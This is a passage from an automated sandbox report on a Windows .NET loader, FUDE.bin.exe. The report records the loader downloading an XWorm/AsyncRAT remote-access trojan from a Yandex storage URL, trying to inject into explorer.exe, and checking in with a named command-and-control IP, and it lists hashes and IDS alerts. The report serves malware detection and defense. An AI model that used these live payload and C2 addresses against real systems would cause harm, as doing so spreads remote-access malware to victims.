              https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://s355vlx.storage.yandex.net/rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821FUDE.bin.exefalse
              • Avira URL Cloud: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000003.00000000.1695776018.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.msn.com/explorer.exe, 00000003.00000000.1695776018.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://outlook.com_explorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              5.45.238.155
              s355vlx.storage.yandex.netRussian Federation
              13238YANDEXRUfalse
              147.185.221.17
              ads-jeremy.gl.at.ply.ggUnited States
              12087SALSGIVERUStrue
              IP
              127.0.0.1
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1487488
              Start date and time:2024-08-04 12:52:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 28s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:FUDE.bin.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@4/3@2/3
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 58
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target file.exe, PID 6972 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              06:53:00API Interceptor2048x Sleep call for process: explorer.exe modified
              06:53:02API Interceptor16114415x Sleep call for process: file.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              147.185.221.17system47.exeGet hashmaliciousXWormBrowse
                setup.exeGet hashmaliciousXWormBrowse
                  APPoKkkk8h.exeGet hashmaliciousUnknownBrowse
                    hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                      file.exeGet hashmaliciousStealerium, SugarDump, XWormBrowse
                        system.batGet hashmaliciousXWormBrowse
                          cheeto.exeGet hashmaliciousXWormBrowse
                            loader.exeGet hashmaliciousBinder HackTool, XWormBrowse
                              NECOv1fTXe.exeGet hashmaliciousNeshta, XWormBrowse
                                OQnTxAi1L6.exeGet hashmaliciousNeshta, XWormBrowse
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SALSGIVERUSSSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                  • 147.185.221.20
                                  Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                  • 147.185.221.20
                                  system47.exeGet hashmaliciousXWormBrowse
                                  • 147.185.221.18
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 147.185.221.17
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 147.185.221.21
                                  Inject.exeGet hashmaliciousXWormBrowse
                                  • 147.185.221.21
                                  m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 147.185.221.20
                                  m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 147.185.221.20
                                  6CDY0k02s7.exeGet hashmaliciousAsyncRATBrowse
                                  • 147.185.221.19
                                  setup.exeGet hashmaliciousAsyncRATBrowse
                                  • 147.185.221.20
                                  YANDEXRU3Vt6Okayik.elfGet hashmaliciousMiraiBrowse
                                  • 5.45.222.116
                                  https://store.microsoft-surface.ru/noutbuki/surface-laptop-5/surface-laptop-5-15/microsoft-surface-laptop-5-15-i7-8gb-512gb-platinum-metalGet hashmaliciousUnknownBrowse
                                  • 77.88.21.119
                                  https://zjnlm.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=radiouserdadambato.com/dayo/vwxmp/c2N1bWluZ3NAdG1oY2MuY29tGet hashmaliciousHTMLPhisherBrowse
                                  • 77.88.44.55
                                  NewAWOFM.pdfGet hashmaliciousUnknownBrowse
                                  • 93.158.134.90
                                  https://www.levada.ru/2024/05/16/konflikt-s-ukrainoj-massovye-otsenki-aprelya-2024-goda/Get hashmaliciousUnknownBrowse
                                  • 77.88.21.119
                                  b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
                                  • 77.88.21.249
                                  https://2m0bi.vk.com/away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=aptitude.webappmate.in/dayo/yyfzw/bmNhcnJAdmlyZ2luaWFob3NwaXRhbGNlbnRlci5jb20=$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousUnknownBrowse
                                  • 77.88.55.88
                                  https://pybu8.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=1844forezcash.com/bin/kpm/sf_rand_string_lowercase(6)/sf_base64_encode/YmxhQGJsYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                  • 77.88.55.88
                                  https://web-debank.com/Get hashmaliciousHTMLPhisherBrowse
                                  • 87.250.251.119
                                  https://tevyl.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=lamachado.com.br/dayo/q3w6t/Y2hyaXN0b3BoZS50aWJlcmdoaWVuQGRhaWljaGktc2Fua3lvLmZy$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousUnknownBrowse
                                  • 5.255.255.77
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\FUDE.bin.exe
                                  File Type:CSV text
                                  Category:modified
                                  Size (bytes):847
                                  Entropy (8bit):5.345615485833535
                                  Encrypted:false
                                  SSDEEP:24:ML9E4KXAE4KzecKDE4KhKiKhPKIE4oKNzKoM:MxHKXAHKzecYHKh3oPtHo60
                                  MD5:58B85D1FC2DF7BAB648ADD4E5125674C
                                  SHA1:BDD72542D63524B5855DDA5D959D2E4DFBC0219F
                                  SHA-256:7D03C319C512738CB7B717D68A32B48A65BB719EBC4BE0142616BFFC943A15B6
                                  SHA-512:FF5DE051BF28612CDD4B6B985A094987E1F90CB2E167DB880BD7A10BE4FE56E56DE727D1AEFDB6BEEACE2B60DACD3CB441FBE3A148CF72D320BA4C6CE22F8F97
                                  Malicious:true
                                  Reputation:low
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..
                                  Process:C:\Users\user\Desktop\FUDE.bin.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):33280
                                  Entropy (8bit):5.569167940439494
                                  Encrypted:false
                                  SSDEEP:768:uE11/wJ4aBceUoxVJt76tRVFr9jozOjhvbv:u81qCS97+DFr9jOOj9D
                                  MD5:91A0CE504DBB22915734E1A3F3C76533
                                  SHA1:E2B791A8938BA1012A5EC3AA94931581C110D231
                                  SHA-256:BF6B8A79708B8786D7061E7D151A0B6E658C3F80EE466C1F268A69263CF5F868
                                  SHA-512:6C06302EF2F8591C5906F0F1F3965547C505993D35AA1D324DBE0246AFAC72AF78ACAC799E75696F8E1F7E6432C4A913A05068EB6A6C061018194322D76C3435
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: ditekSHen
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: Virustotal, Detection: 66%, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....S.f.................x..........>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...Dw... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B................ .......H........O..`G............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                  Process:C:\Users\user\Desktop\FUDE.bin.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):157
                                  Entropy (8bit):4.258793917509505
                                  Encrypted:false
                                  SSDEEP:3:8g84sBsQRN8cTAWWFWiBksTGN8cA9zReAhRDyrRgGZMkK9o7lOzReZGRSqKR1jKX:8jcKN8SzWFWDAGN8V5/DyTYo7gO16/vn
                                  MD5:A944898467DD0B0D230BA8780C834B40
                                  SHA1:D2DDFEC3E9E5F77B9B018B2955E599C796DED1D5
                                  SHA-256:669C1FDE3D0CCFCDDBEDEEF43D4F976D4E1B770F421384F850A48D839356397B
                                  SHA-512:427825F5862C598EC8BFF40BB7DAB42ADCE2E67D34BA16CBA86A3D1F9419482F28A11D38EC75E7573B91EA64C477AF9A1A8D6DB2737D020F897EAE49923F2661
                                  Malicious:false
                                  Reputation:low
                                  Preview:File downloaded successfully...Process started successfully...Failed to create remote thread in explorer process...Failed to inject file into explorer.exe...
                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):4.464994723017809
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:FUDE.bin.exe
                                  File size:9'728 bytes
                                  MD5:36a75d896d48d43a54a8792fd92f3912
                                  SHA1:c5b66bd600539b7d7e60792fd96a385335645d97
                                  SHA256:ec180bdb56a4f587fd198e4bb4d20f488a0124228bfed11ff62f2a20d0d9e618
                                  SHA512:a439d3e1e4650b5eac73b6f3da69fe015a8fd9bda93f4e48a68f5f70e5227d150456d12c3259424f53c0988b9183bb034b3ec2887de3b70ea90e5a148ab95414
                                  SSDEEP:192:aCUuiBzqzs9hRGbPu2j9NoPHNgk9pSDodUholHNmKCxIVfuf:aCUuaWz2+bP7j9gH/ndUholHNmRIVm
                                  TLSH:F5129308B7F9421AF9F78F30EEB257118C36B952AD37CA1D14C2025E1E33B618C62766
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............~:... ...@....@.. ....................................`................................
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0x403a7e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0xFEBCA1D1 [Sat Jun 6 23:44:17 2105 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3a2b0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x58c.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x39a00x38.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x1a840x1c0027f258f16a215ab4726bb68ff9b74db7False0.47237723214285715data4.796468895763772IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0x40000x58c0x600320be0f09a33ed2fc3d4b820e523a60bFalse0.4134114583333333data4.028665456814357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x60000xc0x200665a8f4180d83adf645095c15cbc4837False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0x40900x2fcdata0.43717277486910994
                                  RT_MANIFEST0x439c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                  DLLImport
                                  mscoree.dll_CorExeMain
                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                  2024-08-04T12:55:12.054100+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:03.666562+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:22.009170+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:19.607051+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:04.162220+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:19.414278+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:53.278591+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:06.727310+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:58.871561+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:19.823565+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:43.324630+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:57:00.437174+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:59.408660+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:53:36.371953+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:44.878535+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:38.217006+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:56.743014+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:11.358986+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:35.126136+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:13.787089+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:21.196775+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:53:36.370173+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:35.529623+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:59.409664+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:35.126911+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:43.124107+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:03.265196+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:45.367110+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
